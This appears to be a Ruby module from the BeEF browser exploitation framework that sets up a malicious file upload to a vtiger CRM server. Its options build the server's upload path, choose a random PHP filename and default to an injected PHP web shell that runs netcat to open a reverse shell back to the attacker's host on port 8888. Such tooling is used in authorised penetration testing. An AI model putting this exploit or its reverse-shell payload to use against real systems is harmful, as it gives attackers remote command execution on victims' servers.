37 lines
1.5 KiB
Ruby
37 lines
1.5 KiB
Ruby
#
|
|
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
|
|
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
# See the file 'doc/COPYING' for copying permission
|
|
#
|
|
class Vtiger_crm_upload_exploit < BeEF::Core::Command
|
|
|
|
def self.options
|
|
time = Time.new
|
|
weekno = case time.day
|
|
when 1..7 then 1
|
|
when 8..14 then 2
|
|
when 15..21 then 3
|
|
when 22..28 then 4
|
|
else 5
|
|
end
|
|
|
|
@configuration = BeEF::Core::Configuration.instance
|
|
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
|
|
return [
|
|
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
|
|
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
|
|
{'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
|
|
{'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
|
|
{'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
|
|
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
|
|
]
|
|
end
|
|
|
|
def post_execute
|
|
return if @datastore['result'].nil?
|
|
|
|
save({'result' => @datastore['result']})
|
|
end
|
|
|
|
end
|